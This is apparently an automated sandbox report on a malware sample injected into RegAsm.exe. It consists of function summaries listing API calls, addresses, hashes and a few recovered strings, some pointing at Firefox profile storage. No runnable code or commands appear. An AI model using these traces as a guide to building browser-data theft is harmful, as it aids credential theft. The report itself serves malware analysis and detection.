                                                                                    • Opcode ID: feef1b78a247fc3fa4ddc29145ecb17a01c4799e19a08df0856dd8f06b3e7f82
                                                                                    • Instruction ID: 821aa8aa588a3267b2ec6a7890ee4fd3fa63f1983fa88147b3c87a48a22d2605
                                                                                    • Opcode Fuzzy Hash: feef1b78a247fc3fa4ddc29145ecb17a01c4799e19a08df0856dd8f06b3e7f82
                                                                                    • Instruction Fuzzy Hash: 1721C571600605AFCB18EFA1D9C1EFBB3ACEF18315B10853FE116D65A1DB38E985C658
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?), ref: 6CC6FFD3
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?), ref: 6CC6FFF5
                                                                                    • free.MOZGLUE(?,?,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?), ref: 6CC7001B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?), ref: 6CC7002A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 826125452-0
                                                                                    • Opcode ID: 12b27162f1551ef2bc322ff715a8b29709eef8535d2be9cac9cbb668f7ec739c
                                                                                    • Instruction ID: bfafa36b646b16de20d7e3550097c6cee77d6c2926f041836281edc0c978bfff
                                                                                    • Opcode Fuzzy Hash: 12b27162f1551ef2bc322ff715a8b29709eef8535d2be9cac9cbb668f7ec739c
                                                                                    • Instruction Fuzzy Hash: 9D21F4B2A002155FC7189EAD98D48AEB7FAFB853243254738E425D7780FA71AD0286A1
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041164E
                                                                                    • strtok_s.MSVCRT ref: 00411675
                                                                                    • StrCmpCA.SHLWAPI(00000000,0042650C,00000001,?,?,?,00416DD9), ref: 004116B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • strtok_s.MSVCRT ref: 004116ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s$H_prologlstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 539094379-0
                                                                                    • Opcode ID: 8b8f1fd3ae386cffe5c0d496de41a100932abcbb73e9faa806ea0b753c161961
                                                                                    • Instruction ID: e50a232fc8e2878604ceebe141ac7474a18635b4e39ef4b37662d16f24ae132a
                                                                                    • Opcode Fuzzy Hash: 8b8f1fd3ae386cffe5c0d496de41a100932abcbb73e9faa806ea0b753c161961
                                                                                    • Instruction Fuzzy Hash: 5A2106B1600505ABCB14DF95D981BEFB7A8EF04315F04423FE106E65A1DB78EA488A68
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC4B4F5
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4B502
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4B542
                                                                                    • free.MOZGLUE(?), ref: 6CC4B578
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: 1bcb012eb7aa12904c18088a29dd7ad041d00ef73f955f0d54e8e317fc92304d
                                                                                    • Instruction ID: 48c1169dc9ce747b403f9707add61b2856b8b85d96a47c8c9b00becc81d606ce
                                                                                    • Opcode Fuzzy Hash: 1bcb012eb7aa12904c18088a29dd7ad041d00ef73f955f0d54e8e317fc92304d
                                                                                    • Instruction Fuzzy Hash: 0A11AC38A04B45CBD7128FA9C410769F3B0FF9A318F10D70AE84952B02FBB4B5D48A94
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                    • Instruction ID: 6c12d003c91e958138eed580c0154e496b93e037388a0c8d124b30f15893669d
                                                                                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                    • Instruction Fuzzy Hash: 1911403644014AFBCF225E95CC11CEE3F62BB1C354B58845AFE2959131D73AC9B2AB89
                                                                                    APIs
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CC3F20E,?), ref: 6CC73DF5
                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CC3F20E,00000000,?), ref: 6CC73DFC
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC73E06
                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CC73E0E
                                                                                      • Part of subcall function 6CC6CC00: GetCurrentProcess.KERNEL32(?,?,6CC331A7), ref: 6CC6CC0D
                                                                                      • Part of subcall function 6CC6CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CC331A7), ref: 6CC6CC16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                    • String ID:
                                                                                    • API String ID: 2787204188-0
                                                                                    • Opcode ID: f26b9706b7d01ac24e59bcc73bd739ac8161575e4a751243f20feeb98da804e2
                                                                                    • Instruction ID: 9d300804ed67bedd48821102e6da071106251510fa49828224085e15a2096ba1
                                                                                    • Opcode Fuzzy Hash: f26b9706b7d01ac24e59bcc73bd739ac8161575e4a751243f20feeb98da804e2
                                                                                    • Instruction Fuzzy Hash: 66F01275A002087FDB00AB94DC85DAB377DDB46628F040024FD0857741E636BD2586FB
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                    • lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcatlstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 809291720-0
                                                                                    • Opcode ID: 39667344f9101b2b7fe644fc43952dc8d56ac4cd1daba7bc967c80c1a343ed11
                                                                                    • Instruction ID: 38bc537ac666268100f5265c1d729237def4eef846b7224f466c0159986bfced
                                                                                    • Opcode Fuzzy Hash: 39667344f9101b2b7fe644fc43952dc8d56ac4cd1daba7bc967c80c1a343ed11
                                                                                    • Instruction Fuzzy Hash: 90015AB6900215EFDB209F99D88499AFBF5FF48314B10883EE999E3610C775A944CF50
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004264F6), ref: 0040FC46
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC4D
                                                                                    • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC59
                                                                                    • wsprintfA.USER32 ref: 0040FC84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1243822799-0
                                                                                    • Opcode ID: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
                                                                                    • Instruction ID: 6a3b0a9d5a99a23c7b872276523f8019a9300f8a2912452fb95d56cdfabf1196
                                                                                    • Opcode Fuzzy Hash: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
                                                                                    • Instruction Fuzzy Hash: F7F0FEAA900124BBDB50ABD99D09ABF76FDEF0DB02F001452FB41E1091E6788950D7B4
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8205B
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6CC8201B,?,?,?,?,?,?,?,6CC81F8F,?,?), ref: 6CC82064
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8208E
                                                                                    • free.MOZGLUE(?,?,?,00000000,?,6CC8201B,?,?,?,?,?,?,?,6CC81F8F,?,?), ref: 6CC820A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: 1fd8aa61f2fb3ff2a5a6ef165a275de8574be35f5b55cdd5c98bd3a212b255bd
                                                                                    • Instruction ID: a7ba363ecef7fd4b7c1b29ec385ed93362742bc669c7128d3501e902d6065a11
                                                                                    • Opcode Fuzzy Hash: 1fd8aa61f2fb3ff2a5a6ef165a275de8574be35f5b55cdd5c98bd3a212b255bd
                                                                                    • Instruction Fuzzy Hash: E7F0B4B1201A109BC7118F16D89C75BBBF9EF86328F10012AF50687710DBB5B806CB99
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC820B7
                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,6CC6FBD1), ref: 6CC820C0
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6CC6FBD1), ref: 6CC820DA
                                                                                    • free.MOZGLUE(00000000,?,6CC6FBD1), ref: 6CC820F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: 7d1174ac2bf61cefeba09c69ac75a7664a074a6926acb5316bd4a1344ea7b325
                                                                                    • Instruction ID: 76e149e102248059f2c16f70d5a8d1039b48b1e54a8c2708622b9a547cfe41a2
                                                                                    • Opcode Fuzzy Hash: 7d1174ac2bf61cefeba09c69ac75a7664a074a6926acb5316bd4a1344ea7b325
                                                                                    • Instruction Fuzzy Hash: 1CE0E5756016148BC6209F65985C54FBBF9FF86318B10022AF446C3B00E775B94686D9
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A981: _EH_prolog.MSVCRT ref: 0040A986
                                                                                      • Part of subcall function 0040A981: wsprintfA.USER32 ref: 0040A9AF
                                                                                      • Part of subcall function 0040A981: FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
                                                                                      • Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425E8C), ref: 0040A9E3
                                                                                      • Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425E90), ref: 0040A9FD
                                                                                      • Part of subcall function 0040A981: lstrlenA.KERNEL32(00000000,00425BD2,00000000,?,?,?,00425E94,?,?,00425BCF), ref: 0040AAAD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
                                                                                    • String ID: .metadata-v2$\storage\default\
                                                                                    • API String ID: 2418158533-762053450
                                                                                    • Opcode ID: 436458fe6c3eab354495f11facbcc44a1275279d5afbea107d196bf00171687c
                                                                                    • Instruction ID: a14787033ca920f59e392be47905aa310ec2001b976b3b6e2cbc28ff02bc3610
                                                                                    • Opcode Fuzzy Hash: 436458fe6c3eab354495f11facbcc44a1275279d5afbea107d196bf00171687c
                                                                                    • Instruction Fuzzy Hash: 0B614B70905288EACB04EBE5D556BDDBBB4AF19308F5041BEE805736C2DB781B0CCB66
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CC885D3
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CC88725
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                    • String ID: map/set<T> too long
                                                                                    • API String ID: 3720097785-1285458680
                                                                                    • Opcode ID: a2ee0e7a6e24b434dee6806558f80573ce5ee64091a7b4235445ab55b9e9c6fa
                                                                                    • Instruction ID: 2140abc75b77bfd605806b1b4853986fe4d67bedb3431fac5c25acb84d06685e
                                                                                    • Opcode Fuzzy Hash: a2ee0e7a6e24b434dee6806558f80573ce5ee64091a7b4235445ab55b9e9c6fa
                                                                                    • Instruction Fuzzy Hash: 285164B4602641CFD701CF18C184A5ABBF1BF4A318F18C29AD8595BB66E335E885CF92
                                                                                    APIs
                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC3BDEB
                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC3BE8F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                    • String ID: 0
                                                                                    • API String ID: 2811501404-4108050209
                                                                                    • Opcode ID: 9fd72e3f04b93bdfc3143c00918b56ce7838e11e1df89ec044972582474df977
                                                                                    • Instruction ID: dc0f8432bd8d73194d30666967e99beefccc4b790f38438710aa6e3bf2a419d4
                                                                                    • Opcode Fuzzy Hash: 9fd72e3f04b93bdfc3143c00918b56ce7838e11e1df89ec044972582474df977
                                                                                    • Instruction Fuzzy Hash: E541D271908B55CFC301CF39D4A1A9BB7F4BF8A348F006A5DF989A7651E730D9498B82
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040E062
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                      • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                      • Part of subcall function 0040DE51: std::_Xinvalid_argument.LIBCPMT ref: 0040DE62
                                                                                    • memcpy.MSVCRT ref: 0040E0BD
                                                                                    Strings
                                                                                    • invalid string position, xrefs: 0040E05D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                    • String ID: invalid string position
                                                                                    • API String ID: 214693668-1799206989
                                                                                    • Opcode ID: c4fbb52194d514d2383de81ebaf390774be77460390ae227aae215045b61bd7a
                                                                                    • Instruction ID: fb13f81e348a68403f605101857dbbe0ac2b7e8c850512d56fa6c098faf2f30f
                                                                                    • Opcode Fuzzy Hash: c4fbb52194d514d2383de81ebaf390774be77460390ae227aae215045b61bd7a
